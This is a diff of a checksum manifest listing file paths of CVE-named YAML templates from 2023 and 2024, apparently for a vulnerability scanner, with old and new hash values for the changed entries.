http/cves/2023/CVE-2023-3843.yaml:e8aeab54aa508fc232b867618cdb37eaa7d9061e -http/cves/2023/CVE-2023-38433.yaml:850b3ba22d16833e0e5888ae6428b255bb7edd2d -http/cves/2023/CVE-2023-3844.yaml:41358b9a547fc658630cd5192e8f5fd24359d2b1 +http/cves/2023/CVE-2023-38433.yaml:6a80078eb3154856a386f9f4a88af0326cb45d62 +http/cves/2023/CVE-2023-3844.yaml:da12e5b14e3952041233defd69646050a3110cc4 http/cves/2023/CVE-2023-3845.yaml:ce7fcd2beaf4569029a2858d37901b8cf459d940 http/cves/2023/CVE-2023-3846.yaml:4ed1668afe32b491fdc55b828e4a5611c0967f44 http/cves/2023/CVE-2023-3847.yaml:60407e2940cf8f721eb6f942c68ee24d68185a34 http/cves/2023/CVE-2023-3848.yaml:0dfa9f82d648a6f7c421af52421bded8f1f5bb6d http/cves/2023/CVE-2023-3849.yaml:8d921cdb62c336eadc8abebe7947cad3ec493b27 -http/cves/2023/CVE-2023-38501.yaml:caacffd1047e5d298f452d113ed290181b54a1f8 -http/cves/2023/CVE-2023-38646.yaml:b545190ed42626f3a49b4bc2bd98ec54899acbc2 -http/cves/2023/CVE-2023-38964.yaml:5c49a7987f8b490e18be173969a1371cd0d8a41d -http/cves/2023/CVE-2023-39002.yaml:3449001ccee7076abec235de9bd4659071202c37 -http/cves/2023/CVE-2023-39026.yaml:fc71aafa8c88cc2a530f4a7842ff2ba12d6c6eed -http/cves/2023/CVE-2023-39108.yaml:f5db8fc08678303bd462b24bf153d3c23c0350ec -http/cves/2023/CVE-2023-39109.yaml:3e84fb48e4dea9672eaac9e32660ae57ffede95a -http/cves/2023/CVE-2023-39110.yaml:1d75da26409647a1f57071a40f570b28ea1c210a +http/cves/2023/CVE-2023-38501.yaml:ee88744cf62b1b968bfc451f537d9713e0b16dd9 +http/cves/2023/CVE-2023-38646.yaml:becb18fa384f8abb258c43e4c6473e9514fdd640 +http/cves/2023/CVE-2023-38964.yaml:7a989bd0f3aaa9c8f29516966ce9f47b8b9de548 +http/cves/2023/CVE-2023-39002.yaml:232e8fe2d23f36bd86981d0d1ebe2457ffe05e0b +http/cves/2023/CVE-2023-39026.yaml:4e6718ad951b36de10ede3280f0e7d4a595c0ca6 +http/cves/2023/CVE-2023-39108.yaml:e6b8de38d8e323e1db1abcd35909a66798434e10 +http/cves/2023/CVE-2023-39109.yaml:af99810bed59f612da7af10496b871bc25301f0e +http/cves/2023/CVE-2023-39110.yaml:2cd33ddf979c5f9ea4a067467a52259399157964 http/cves/2023/CVE-2023-39120.yaml:fe50f8e80ac67803942ed0b7fd0204e8f1fadbfc -http/cves/2023/CVE-2023-39141.yaml:1f5741a82daa48e1242abe049c9c2ac7d63b9673 -http/cves/2023/CVE-2023-39143.yaml:175a3cbb4a85e3c56d37dd43f0316984a11bcaf4 +http/cves/2023/CVE-2023-39141.yaml:00f30e0b61c4d370319c440131de1a66a204d542 +http/cves/2023/CVE-2023-39143.yaml:3cbe8e2370dda48e8ae904c135c1c5ebe4352781 http/cves/2023/CVE-2023-3936.yaml:86f325fd48ca47e7f4cdfe3581027bc2514c4f12 -http/cves/2023/CVE-2023-39361.yaml:53379bb2dc1b7b6fda25a6b9b031da51b7017423 -http/cves/2023/CVE-2023-39598.yaml:9049f96d9df80ac7f18e9dc60b243a9a29b29454 -http/cves/2023/CVE-2023-39600.yaml:19487bb36baf066ca01bf3fab2c013086083c304 -http/cves/2023/CVE-2023-39676.yaml:22d457a3bdff95a774399f03bf8a75a652a8789f -http/cves/2023/CVE-2023-39677.yaml:0ad5146b105373f328f09bbee9b0394c8186ac63 -http/cves/2023/CVE-2023-39700.yaml:01ab37659c7031b101f3ea6bd08134b98d8a317b +http/cves/2023/CVE-2023-39361.yaml:251196ba127c4cce3b9a743255fcd3e8dd6b72b4 +http/cves/2023/CVE-2023-39598.yaml:e45cc659e0145f32c22e647eb9aa760d80483933 +http/cves/2023/CVE-2023-39600.yaml:05a96384c47d1663281136e1ebd853dca39f6e5b +http/cves/2023/CVE-2023-39676.yaml:6f3625a79f9d80b5581225efbb1999b18cb15e63 +http/cves/2023/CVE-2023-39677.yaml:a0c8dbbb56fc6ae2be2c499bb5819697a20d3281 +http/cves/2023/CVE-2023-39700.yaml:66065775e568c16ac1384410c098e745aa2d5aa6 http/cves/2023/CVE-2023-39796.yaml:a729bba89e9885a729b5fd594b78afc93de872b1 http/cves/2023/CVE-2023-40208.yaml:3bd72bed6969fb8149de3c31b7909d9c88799d1f http/cves/2023/CVE-2023-40355.yaml:7761faee9b0236c926e300d32db3a9508227204d -http/cves/2023/CVE-2023-40779.yaml:4cd840617f8f7a59b0d31f37c0a0d2c089c2762a +http/cves/2023/CVE-2023-40779.yaml:f6c3ca4ba9db46609d07ac3cc0e28b1e05b151c1 http/cves/2023/CVE-2023-4110.yaml:83f4284a809037eb7d4ef4b7b3f11deadb3440af http/cves/2023/CVE-2023-41109.yaml:c8149b1952ea7315ce40e355fd02b165c46cbad8 http/cves/2023/CVE-2023-4111.yaml:437dd6aa165710e549632a8b1a48ba5bdfed9c4a -http/cves/2023/CVE-2023-4112.yaml:189a46f7d9458fd3110e2c9828872deb106f1e5f +http/cves/2023/CVE-2023-4112.yaml:a46d18b6e3c01cfa5bc4a28b681e90b12e317399 http/cves/2023/CVE-2023-4113.yaml:9718137c9767d86dce907f001a2e138fb4d7841e http/cves/2023/CVE-2023-4114.yaml:5ba02fe30cf771bc4115635a3984bebc3457118b http/cves/2023/CVE-2023-4115.yaml:b0d90d4bf5bb9dcac3b1b52d45aaa0f2d586613e -http/cves/2023/CVE-2023-4116.yaml:79915a9eaf103dac3be5fc934c949e78fbd319e2 -http/cves/2023/CVE-2023-41265.yaml:d38544289b23e65bb65723da2f94d926e03bc3e0 -http/cves/2023/CVE-2023-41266.yaml:f7cb353f5de770a87d089f632b1612052f0319d0 +http/cves/2023/CVE-2023-4116.yaml:b481df73bbe4c022070f9320f387d04d3694ab93 +http/cves/2023/CVE-2023-41265.yaml:93db4b73723e897472002fd29875bf430f5e48d0 +http/cves/2023/CVE-2023-41266.yaml:4dfd0f0dfa477b137fc2e259ced3fc534a62ef7c http/cves/2023/CVE-2023-4148.yaml:dd568e6c72619e2d55cc4ef764fc5944636c7946 http/cves/2023/CVE-2023-41538.yaml:4e735c71f54ac27baa8987be74e444bbe0f9775c http/cves/2023/CVE-2023-41642.yaml:fbee72e0d62b6fa6c43e1bb34c5800412ac27d0e http/cves/2023/CVE-2023-4168.yaml:0006757cc3858b565e930fb9235b2269e59b1d64 http/cves/2023/CVE-2023-4169.yaml:639f6a6b20b2c228fb24159376e31c38682b5364 -http/cves/2023/CVE-2023-4173.yaml:365d1cb5b2bebe20e788d65518fc610e8a22ce87 -http/cves/2023/CVE-2023-4174.yaml:fc65029f2aaeebb1a5e37d04bfc498941a584c0d -http/cves/2023/CVE-2023-41763.yaml:536064beb3e34c084d16d18c2bed0f5db2296bfc -http/cves/2023/CVE-2023-41892.yaml:f6020a88dbaff06019ec79f60686616bb17db2b2 -http/cves/2023/CVE-2023-42343.yaml:c1bffaa8664049b88b3f225dccf9b3e372fdf1bd +http/cves/2023/CVE-2023-4173.yaml:f206e31220ca3c55c166a77131fffa69d8316f9d +http/cves/2023/CVE-2023-4174.yaml:41026f595a36739b329b6c0771cfe51279c4df6d +http/cves/2023/CVE-2023-41763.yaml:4e6fdd838f1b664ca7b3bd019b865b593ba09ce3 +http/cves/2023/CVE-2023-41892.yaml:6089588092525d265ca1d42cbc00f6c90fcb4a49 +http/cves/2023/CVE-2023-42343.yaml:44cdefd4a8d279a4c3c7f849d4ab93440f245d0c http/cves/2023/CVE-2023-42344.yaml:674f69182dcf67d59a4a19c9adfc0b2e92fe5645 -http/cves/2023/CVE-2023-42442.yaml:d758c6128139420e4eac53717980f5e310e7a0cb -http/cves/2023/CVE-2023-42793.yaml:b72d97514990752b6ccc63f48b6782d6467ac42b +http/cves/2023/CVE-2023-42442.yaml:fc5b468630f7ca32691c2cb472d8ef56c72fb258 +http/cves/2023/CVE-2023-42793.yaml:a8dc601ce6a5022c5b2c6ddf38fb1c10bb89caf7 http/cves/2023/CVE-2023-43177.yaml:0605e78cef73e2c3e0ce29c115e4bf8028a16c7a http/cves/2023/CVE-2023-43187.yaml:dbb0d7b9be18eb24fd7858deccbdd2824fb2f204 -http/cves/2023/CVE-2023-43208.yaml:f1ece752ca9942c76379ef47d20c1dc6f6814173 +http/cves/2023/CVE-2023-43208.yaml:9ec85a78d8c6f69dcdbd4751b1d6ed2ce6a0deb5 http/cves/2023/CVE-2023-43261.yaml:4c534b1a5dd5916c25664920de4051ffa1310bf1 http/cves/2023/CVE-2023-43325.yaml:cad3358ef79bdf761c1bbb77c839e9af325f506f http/cves/2023/CVE-2023-43326.yaml:f117aa600d3815d4394d93563495b9a183a6b76d -http/cves/2023/CVE-2023-43374.yaml:d3716d82a599eec38d7248bceb7a95b73dd5812f -http/cves/2023/CVE-2023-43795.yaml:ac764a43ee503fd6799b47c652c8b23fa413e1ac +http/cves/2023/CVE-2023-43374.yaml:dc8b1b9c649558fa3bfa467f7a2b12d1a0a090b6 +http/cves/2023/CVE-2023-43795.yaml:6f5afe9c1473d148781005d35b3943a39aa4ab4b http/cves/2023/CVE-2023-4415.yaml:17cc5b909d851380cf62dcece5db812a7e1ea68a -http/cves/2023/CVE-2023-44352.yaml:f48ccac60a8d013601f2e1706e8326e3243cc2c6 -http/cves/2023/CVE-2023-44353.yaml:82991b999365d1cac94d95fd52aff5f8ea89506b -http/cves/2023/CVE-2023-4451.yaml:d912d3e1ed3cc84ee7b6416839b28a16e5566955 -http/cves/2023/CVE-2023-44812.yaml:f2aaf62c29bd8b70f20804e1b56537d9f5ec3712 -http/cves/2023/CVE-2023-44813.yaml:350f2faeb325dd8eb6e0c73262240ef5a2eeccbd -http/cves/2023/CVE-2023-4521.yaml:4e3f3a6520dae179752fb5bf24b967b99d65f4a1 -http/cves/2023/CVE-2023-45375.yaml:a49c50475479435dd05b4a3f6ff7549e2e4de081 -http/cves/2023/CVE-2023-4542.yaml:94982eb03aa4a5a1d8d17e37d9a3e7110da81d64 +http/cves/2023/CVE-2023-44352.yaml:3ba0d458af2298128a4107dadb58efda025f8a53 +http/cves/2023/CVE-2023-44353.yaml:3b7cb97393782c7aad88aef741820cb4922dd584 +http/cves/2023/CVE-2023-4451.yaml:7013c4a2ac8b03f7fef1cd63fad2cd5e534315ed +http/cves/2023/CVE-2023-44812.yaml:35f649b3ec2a6ec2839baef272bd27e164f9b43a +http/cves/2023/CVE-2023-44813.yaml:db3d33cb6c9a1b50551c7553654f73a619665f79 +http/cves/2023/CVE-2023-4521.yaml:cc05887f49c8f90706c29bf9bedff649f9142ccd +http/cves/2023/CVE-2023-45375.yaml:83937401fd3fb72656256cb940869db251cfdb64 +http/cves/2023/CVE-2023-4542.yaml:e920376a741cba1397a1452f2b2c1037fc523785 http/cves/2023/CVE-2023-4547.yaml:f35005a0035fb0980139129649d73a6f577bbd66 http/cves/2023/CVE-2023-45542.yaml:137cadf0894adf5a9bbb7e447a9b7d4d2ca849e6 -http/cves/2023/CVE-2023-45671.yaml:f573f401497165968fc2e77f7c722accd3052148 -http/cves/2023/CVE-2023-4568.yaml:b3519b98d445f49c15ec25def5abf6f71f7502a1 -http/cves/2023/CVE-2023-45852.yaml:d333744fa6118d998f0dc5f601625859966c461d -http/cves/2023/CVE-2023-45855.yaml:467a093aca097d3c97d6fce9fa38725202433759 -http/cves/2023/CVE-2023-4596.yaml:6e50ca87bfa5d77ea31f04d6bb5022c236ac9340 +http/cves/2023/CVE-2023-45671.yaml:e914b554522692fd1abea7bd7a249d6a4f1c0132 +http/cves/2023/CVE-2023-4568.yaml:1e8cfc4a8d5702a5983d694a51e520a3b0873abf +http/cves/2023/CVE-2023-45852.yaml:d39ba1794537aef42102e2fe48b365b78741b23d +http/cves/2023/CVE-2023-45855.yaml:eaddbc4fb0b7eead9adf6cb0494bf36881f0efb8 +http/cves/2023/CVE-2023-4596.yaml:603ccaf7c6a43f545e74a1815e654f5574afa94d http/cves/2023/CVE-2023-4634.yaml:25ca2cd6e1903db0a7bc4d306856e30d2b98f8fc -http/cves/2023/CVE-2023-46347.yaml:b34a7dc91ea30e9c2109c7b75f3672336a67738c -http/cves/2023/CVE-2023-46359.yaml:9c1bcb93e8ca6c307f8ac5012de374ed21837245 -http/cves/2023/CVE-2023-46574.yaml:ad5fe1bb6f5e09d7a12160ada18cf418316d3182 -http/cves/2023/CVE-2023-46747.yaml:b27d327fbc25444c121c20945c0e2fad4a913f53 +http/cves/2023/CVE-2023-46347.yaml:f06e431965103c65099bb522dd1a07a5c5c29490 +http/cves/2023/CVE-2023-46359.yaml:41e3418ce4b1f2cb19045d7711bb09cdcf85d906 +http/cves/2023/CVE-2023-46574.yaml:5693104f4f9e4ef10d187f3db1677b14ac0e01a7 +http/cves/2023/CVE-2023-46747.yaml:d15410bfd07abd35959131c7401f6c0274ff43b8 http/cves/2023/CVE-2023-46805.yaml:1b2422c71b91214c98e03d968a0f8bc7db02914b http/cves/2023/CVE-2023-47115.yaml:f5f0d4869bc075f448f560f87f29febd4cc63497 http/cves/2023/CVE-2023-4714.yaml:ded522e184551747912d5a2c70df1be0bb4cc545 -http/cves/2023/CVE-2023-47211.yaml:aba86670623dcf39feb32dd7042ab9a29ed72a45 +http/cves/2023/CVE-2023-47211.yaml:6e94b6fc875e2b5825f2bb2f6cdd944c4120ec6f http/cves/2023/CVE-2023-47218.yaml:ba61fc9e686e0c5f28048e666320fccb7bef32aa -http/cves/2023/CVE-2023-47246.yaml:7f0547a2b48fb64eef94636f8033c984eda1840c -http/cves/2023/CVE-2023-47643.yaml:9a9f282f0113bc4a94d4cd55d184bd13e6488e76 -http/cves/2023/CVE-2023-48023.yaml:4df3bf24775e2c4cd1e3225aaed8e9ab7ee2c73e -http/cves/2023/CVE-2023-48084.yaml:eff7decc7c45e122e653f200399885bb44ff01f6 -http/cves/2023/CVE-2023-48777.yaml:c747ded46f8e3a84ce76d1c7936d28733c2c8cb7 -http/cves/2023/CVE-2023-49070.yaml:6c28abe1b512113e46615f78c895b0f8b7d88a53 -http/cves/2023/CVE-2023-49103.yaml:df7f916859a7176f5867dd438b7b25c4598e8194 -http/cves/2023/CVE-2023-4966.yaml:afd8e0c40d087f04b630fbe118e1eaa3cab06596 -http/cves/2023/CVE-2023-4973.yaml:abedefada4ac0c871cf7f7d70b2a34ad065b7ba7 -http/cves/2023/CVE-2023-4974.yaml:17ee929a70a9d371a6eb202b2d989b57e6fc371f +http/cves/2023/CVE-2023-47246.yaml:6284694374446f3dad6d6d19199eef9716fedce8 +http/cves/2023/CVE-2023-47643.yaml:930c8146dc661112f8f6813377b474cc8ef4af43 +http/cves/2023/CVE-2023-48023.yaml:697087ed9d6a9a5d6ddb11ac6bbcc476af250fda +http/cves/2023/CVE-2023-48084.yaml:f94375b7b04cd7068a194de7bef08031e49b8ec9 +http/cves/2023/CVE-2023-48777.yaml:a83222021b8b880d20e37f86385eefd707ea58a6 +http/cves/2023/CVE-2023-49070.yaml:d06065b05629420013472d48c582cbe5e961acca +http/cves/2023/CVE-2023-49103.yaml:ee6296775282d45749ed9696b95f65ef7e7fb409 +http/cves/2023/CVE-2023-4966.yaml:d391f17d820a58050a92f2bf705c954fadfc33d6 +http/cves/2023/CVE-2023-4973.yaml:ade0057226a18eefca978599bcc7536828e2b0ba +http/cves/2023/CVE-2023-4974.yaml:065f5e7ac20a53380a674788a3f2962757d556f5 http/cves/2023/CVE-2023-49785.yaml:97699a3c262cb416153932623d07c232dc350da0 -http/cves/2023/CVE-2023-5003.yaml:a391fe60d1332779d04102762bfaac503c01b99f -http/cves/2023/CVE-2023-50290.yaml:a89cabb1f8777c2fa48dc314c6a8bb482d2a3806 -http/cves/2023/CVE-2023-5074.yaml:2f91841fa7a9ca7839288a0c2539941f0e9f815b -http/cves/2023/CVE-2023-5089.yaml:b49f08cd62fce95d77dfdd2c17355553b5b78c24 -http/cves/2023/CVE-2023-50917.yaml:24ba1b92719da10e25c7faa5a21b8e1793efc1e6 -http/cves/2023/CVE-2023-50968.yaml:1c7231aa1afc9b9f470216bd2f64d2e084e0c564 -http/cves/2023/CVE-2023-51467.yaml:ea8aacef3fc466e4a13378dffd2b8bb52defa1fa -http/cves/2023/CVE-2023-52085.yaml:cc65c397628889cec7f61857da0b323c8b0e7f4e -http/cves/2023/CVE-2023-5244.yaml:03d55a9e17a9b51e7a9aa871411021c9a98da704 +http/cves/2023/CVE-2023-5003.yaml:8ee343116f222de42948949e5ffd260ff7f651f6 +http/cves/2023/CVE-2023-50290.yaml:3bf7844e47af925c9bb7e46c3765099ebcc62a37 +http/cves/2023/CVE-2023-5074.yaml:333898fb41033b86f19a1b7ef66c883abf0dc603 +http/cves/2023/CVE-2023-5089.yaml:2adf5e270a9a8d3e62f38f80d15c81ff6f73c86c +http/cves/2023/CVE-2023-50917.yaml:8485c56545fb01ececff61d1b187e86cf10359ff +http/cves/2023/CVE-2023-50968.yaml:d701b9d9beed14eb605f246a8385d5ae63549044 +http/cves/2023/CVE-2023-51467.yaml:8e576c733e78323aedf0aba8db9f668cf92c2165 +http/cves/2023/CVE-2023-52085.yaml:1c4308ded46381ed085ad4734d3f8589b3b41e32 +http/cves/2023/CVE-2023-5244.yaml:597ba45149281f648c68ff143dc31b0e76374daa http/cves/2023/CVE-2023-5360.yaml:1914270d0878333c4f7605b7686f1c0ad1c009f8 http/cves/2023/CVE-2023-5375.yaml:c2c3a1f499a12f579dd2808bc0f40ed32cef2ecc http/cves/2023/CVE-2023-5556.yaml:d4312b384f0e855174b1ac442795700fc93c8bbf -http/cves/2023/CVE-2023-5830.yaml:1aa70a4ec2154915982b9abe3a74c505dfb4d780 -http/cves/2023/CVE-2023-5914.yaml:475f2bb7c026929585409314f7c8fd6f35cce886 -http/cves/2023/CVE-2023-5991.yaml:9873fa30a831b40e777a00fc4ac02f243ac75b69 -http/cves/2023/CVE-2023-6018.yaml:0ebc4933948b094af932753294baf1f5f43be5ad -http/cves/2023/CVE-2023-6020.yaml:53d613fc898b341e0e4636b42bb596feabf64888 -http/cves/2023/CVE-2023-6021.yaml:9f6d4772e7a300d8e9c4c5899e9e46bfc4a58082 -http/cves/2023/CVE-2023-6023.yaml:3a730637eccac887e1162588d4f19076f1767008 -http/cves/2023/CVE-2023-6038.yaml:45afe9e78f6b59a1cf80b02d2cd461f51a7274a7 -http/cves/2023/CVE-2023-6063.yaml:b776af7a38c9a9240931b1c106226cbe2efd7ed9 -http/cves/2023/CVE-2023-6065.yaml:b8808f0d626ba5e51da0c22de6f1b564455133e7 -http/cves/2023/CVE-2023-6114.yaml:5dc0c50f0958887f67d7ed03075e3983350045fe -http/cves/2023/CVE-2023-6360.yaml:ded41747153de73db0aa449ecfd1b3d32965f434 -http/cves/2023/CVE-2023-6379.yaml:344ac33322c6ae6e332b9223d49a9a728489231b -http/cves/2023/CVE-2023-6380.yaml:b8c966913d7f35aa184b05f6c05c139d619191b0 -http/cves/2023/CVE-2023-6389.yaml:80902b5a71d8f7f58b612c269eac562c10153ff1 -http/cves/2023/CVE-2023-6553.yaml:c572f40098138cb52f89c91950c68594cce89adf -http/cves/2023/CVE-2023-6567.yaml:1bd331b977c1566ead0ba2214ef5e0c1e41970cf -http/cves/2023/CVE-2023-6623.yaml:e781090c3c7e05d6ac52f9ed663eb47bc99f9e72 -http/cves/2023/CVE-2023-6634.yaml:271edc659ab6198e503f6b2f853dd7b638123507 -http/cves/2023/CVE-2023-6831.yaml:61fad718001632269bbc179436be24568b060fd4 -http/cves/2023/CVE-2023-6875.yaml:49ae1c1fe43946afb693947ae99199caa87c21b6 +http/cves/2023/CVE-2023-5830.yaml:2f8a57cf5b24a79ddb3beb3a1b7afb5b7f46ec1f +http/cves/2023/CVE-2023-5914.yaml:a86ac76b1ff712183218ce7828a44b2322ac6691 +http/cves/2023/CVE-2023-5991.yaml:2b58ad837e4ef570c331764533e0537d299134c3 +http/cves/2023/CVE-2023-6018.yaml:6e786051da470cff47db25c70cae932d2d11c5b4 +http/cves/2023/CVE-2023-6020.yaml:2e5a46f2b86f9571e16bef30f788c23371873483 +http/cves/2023/CVE-2023-6021.yaml:0b6c229e8f98e96f337526d324b835b089b35e05 +http/cves/2023/CVE-2023-6023.yaml:2e1e8047589f80145773005880924fb1630cedd3 +http/cves/2023/CVE-2023-6038.yaml:ec35d80f5e18691465abba091626dc0269bb94e3 +http/cves/2023/CVE-2023-6063.yaml:ce9b1337d54661d00ecde7ce71f9af7c6424b482 +http/cves/2023/CVE-2023-6065.yaml:3b7d1265356ff18ee004967d92bb0526b49508eb +http/cves/2023/CVE-2023-6114.yaml:5f72629ff4c06f75a7934d33fc0e9560e41e4aa7 +http/cves/2023/CVE-2023-6360.yaml:f551bf7a216058f7e21fc611f07a64f13936bcc3 +http/cves/2023/CVE-2023-6379.yaml:fea4f85b8a06d983baccc0a46c3bf06428b00f66 +http/cves/2023/CVE-2023-6380.yaml:9cf66bb792a23fb8d60cde7efc9297bd34dd4e3f +http/cves/2023/CVE-2023-6389.yaml:aa2ca6dd124ab01108332d25d50795974c8966ff +http/cves/2023/CVE-2023-6553.yaml:c39cbdf2fd1401566278a9c67acfd778cc7e0a33 +http/cves/2023/CVE-2023-6567.yaml:cdce1a98c1e388ed8654fbba85a84206aa3fd060 +http/cves/2023/CVE-2023-6623.yaml:381dfb438bdd789de214cbe9b297e0d21426dd8e +http/cves/2023/CVE-2023-6634.yaml:c45be4fd51bc88b85bef9da0576508f125e771c4 +http/cves/2023/CVE-2023-6831.yaml:5995ef975cd70e924dee68190168106f60042687 +http/cves/2023/CVE-2023-6875.yaml:8b565894b3e019b7cb5f830b959b4726b5266111 http/cves/2023/CVE-2023-6895.yaml:50fd3c56376c3c233216803d769fd1a705fc052c -http/cves/2023/CVE-2023-6909.yaml:3a1c12f4b5868f39c614d7b619700d37dedd588b -http/cves/2023/CVE-2023-6977.yaml:57fe00b51cc1fda9f7e1850ccd265acc0f52ef69 -http/cves/2023/CVE-2023-6989.yaml:8510679254d0c54f4292b95a24fc1344d768c3b2 -http/cves/2023/CVE-2023-7028.yaml:56b5cd908db926c6a908a68d79b3304f6f327a5e -http/cves/2024/CVE-2024-0195.yaml:1029799f6633077e409b399fb30e7e44cdb20487 -http/cves/2024/CVE-2024-0200.yaml:8def6d854c9af306acaea3df5ce36cf2067e255a -http/cves/2024/CVE-2024-0204.yaml:e9fa443bf70ed09783f89718081890844601391f -http/cves/2024/CVE-2024-0235.yaml:a7f3ae0fbae1d5e167c40c248558a60e210ee480 -http/cves/2024/CVE-2024-0305.yaml:4c322a618eab85bc9f4809462de046feaaeb0701 +http/cves/2023/CVE-2023-6909.yaml:ea03a39bc9ec9a5d71dce0b19a6ef34b7ca7e677 +http/cves/2023/CVE-2023-6977.yaml:c98a9d3b0945e2796860a783e5792fd2076a2635 +http/cves/2023/CVE-2023-6989.yaml:ef6879d5fdb558ba1011a99b330bf370b91cecd6 +http/cves/2023/CVE-2023-7028.yaml:55feb15373ca1189a1fbf3798104d3d856072a61 +http/cves/2024/CVE-2024-0195.yaml:853d9c6bdb1557e237392253d6e9f31e46a3148b +http/cves/2024/CVE-2024-0200.yaml:db3db17f0e89a1431f267c606358e332a99c03de +http/cves/2024/CVE-2024-0204.yaml:1fae46e1cd227466c3c3feaf80a3138de83202d7 +http/cves/2024/CVE-2024-0235.yaml:c69e7d5bb5af115d21e8637b6c284b3cef728f3d +http/cves/2024/CVE-2024-0305.yaml:f41f0078cdcfbc8f314bafadaf75f66f1b3b7318 http/cves/2024/CVE-2024-0337.yaml:4a573bdaf757a5eca3d9892d080c0ccc038119d7 http/cves/2024/CVE-2024-0352.yaml:f2f46e8a92d48c008e17233656b4941b3fc4c874 -http/cves/2024/CVE-2024-0713.yaml:4233f7803e3cb90da0851977a4c6de497a18d61b +http/cves/2024/CVE-2024-0713.yaml:e18c2f9242ea9c4bf6c74628267441b984c92439 http/cves/2024/CVE-2024-0881.yaml:a827b28c2e217c38e6a44902abf23f5df53bb437 -http/cves/2024/CVE-2024-1021.yaml:99e0b72a97304c3bf86a4a78e5f6b721221683fb -http/cves/2024/CVE-2024-1061.yaml:df85be53c1a8e56e06eb9abf580e173b7d9b984d -http/cves/2024/CVE-2024-1071.yaml:4db8738e930dacc926156a093eed6602d60a583a -http/cves/2024/CVE-2024-1183.yaml:13a0cbff374005b467ac0b663f895021b5d981a8 -http/cves/2024/CVE-2024-1208.yaml:a64398099908496a14705ee1ea9a82ef498f471e -http/cves/2024/CVE-2024-1209.yaml:83acee361fad278c37690439c442a8deef01cd3c +http/cves/2024/CVE-2024-1021.yaml:d051c28678ddf7ab106a7380a9c8b1add058089f +http/cves/2024/CVE-2024-1061.yaml:c7581b37598881c648b19efc0faf21d6d2a0d942 +http/cves/2024/CVE-2024-1071.yaml:0f1f2cd742123216a64316396de055a5d69ab2c6 +http/cves/2024/CVE-2024-1183.yaml:312273b8447e8ecf23d1a19d0a502e8c68b4ee9f +http/cves/2024/CVE-2024-1208.yaml:d00305fb5949ba4044bfef97f71e5b5421596414 +http/cves/2024/CVE-2024-1209.yaml:ca30f5ace1cb3cc4f87869d139c8b1437f5929c3 http/cves/2024/CVE-2024-1210.yaml:7af2bde109e8f0dbb0af5f22cdbcfd5e2c0cc132 -http/cves/2024/CVE-2024-1212.yaml:ff3afc7fa9564d0aadd7087edb0eb9e0fd329ffe +http/cves/2024/CVE-2024-1212.yaml:900bf5a48a355264fc661b1bde6698301d4d74b5 http/cves/2024/CVE-2024-1380.yaml:20b25b6bb316198f59ab5b21284278df2eeb480f http/cves/2024/CVE-2024-1561.yaml:659c9112fbbf202496c98637b8ffcfd2665024ab http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 -http/cves/2024/CVE-2024-1709.yaml:3978d9abbcba91bb6b6fe4cf6130cc35695bd1b8 +http/cves/2024/CVE-2024-1709.yaml:102af214d4495a68e74bb891c2773bead94590b9 http/cves/2024/CVE-2024-20767.yaml:241fd099c8ac13ce65b6bc56f755be96783242a2 -http/cves/2024/CVE-2024-21644.yaml:77f0255102382e9e404d4054408803175ca19cf5 -http/cves/2024/CVE-2024-21645.yaml:767ebb9ae34a75ef4ea555762287fa63997897d1 -http/cves/2024/CVE-2024-21683.yaml:657419eac116dffe80bc62d4e4588a2168564b67 -http/cves/2024/CVE-2024-21887.yaml:4b36342fe050f53bc2ff1ac11ca13e95b404bad7 -http/cves/2024/CVE-2024-21893.yaml:599b798ebf591a068799a211d4764cacf0e7508f -http/cves/2024/CVE-2024-22024.yaml:9af28e0670ae9c74797592276bfaa6417776c078 -http/cves/2024/CVE-2024-22319.yaml:82399268f85f4057eb6c759cd2699c9005f15a3b -http/cves/2024/CVE-2024-22320.yaml:161fb9579017c222d6792c1dcc6a9223edecdcdb -http/cves/2024/CVE-2024-22927.yaml:9c87536b6f8b4467aac60188d0b0f3ceee471bc9 +http/cves/2024/CVE-2024-21644.yaml:c4ef96cc8efd3d2688c65e91654e0e47214f6bad +http/cves/2024/CVE-2024-21645.yaml:85d1af5d6112eefd89dd13a1fb1b127e46bf5025 +http/cves/2024/CVE-2024-21683.yaml:cf57cefd1dfcb83eddaee02631235d1f4cd0e3f5 +http/cves/2024/CVE-2024-21887.yaml:ea90173fd68f86d7fadd65f9e7f92b96bb702fc7 +http/cves/2024/CVE-2024-21893.yaml:e4d30c086d3cce0f7d335d07cd3880e08008cace +http/cves/2024/CVE-2024-22024.yaml:b30e59d8d609c95c683e30814eccf7a4947fe4d5 +http/cves/2024/CVE-2024-22319.yaml:4cbfc5a519aedfc5797a55f1d9e987878ea1affa +http/cves/2024/CVE-2024-22320.yaml:8d803ff557285de94979ed92b6631bf6a0c702b3 +http/cves/2024/CVE-2024-22927.yaml:adfd631dfe9e98aca8497b0e83e8d9d250bece6d http/cves/2024/CVE-2024-23334.yaml:c7735b96c11cb5fb87ede7ad978c21a2e2bb2bbe http/cves/2024/CVE-2024-2340.yaml:2b0b9e95cf442c8b162d18c5d337c05baac60b18 http/cves/2024/CVE-2024-2389.yaml:6fa69f07abbcfc935f223d3196bcfafc693c1c07 -http/cves/2024/CVE-2024-23917.yaml:da590499bc9e18895403a8cb81ea4c93bfbec9ef -http/cves/2024/CVE-2024-24131.yaml:48167253e7792f9b8917abc160391bde7497afff +http/cves/2024/CVE-2024-23917.yaml:a125724840c62f5a0883845b29c45260cf9e5db0 +http/cves/2024/CVE-2024-24131.yaml:fc220892f672bbd646e7d59dd36a87b558384a5e http/cves/2024/CVE-2024-24919.yaml:32ba8338c24aa5d9b6bc4780c00087a850faabe8 http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 -http/cves/2024/CVE-2024-25669.yaml:970b706816344e71cfc971f7e2b69be44296cd81 -http/cves/2024/CVE-2024-25735.yaml:e6bb34d06213eebd89b7290f8a32a2c43772f8b6 -http/cves/2024/CVE-2024-26331.yaml:717487e16279f4cd2d5666a4d83ab53f0475c4a2 -http/cves/2024/CVE-2024-27198.yaml:11820d1d61eb185078709185d0cda080414cb333 +http/cves/2024/CVE-2024-25669.yaml:0bd3ad0e9810f1534fe33874b3d394be149c9c4a +http/cves/2024/CVE-2024-25735.yaml:ab6082a5398e304b6eb1d81781ca3b0696911a8a +http/cves/2024/CVE-2024-26331.yaml:3d55661a57ed97ee450fbcc6e7d65258201b4eb6 +http/cves/2024/CVE-2024-27198.yaml:e6c43366ad88322747338defddbc5e9f0b41cff7 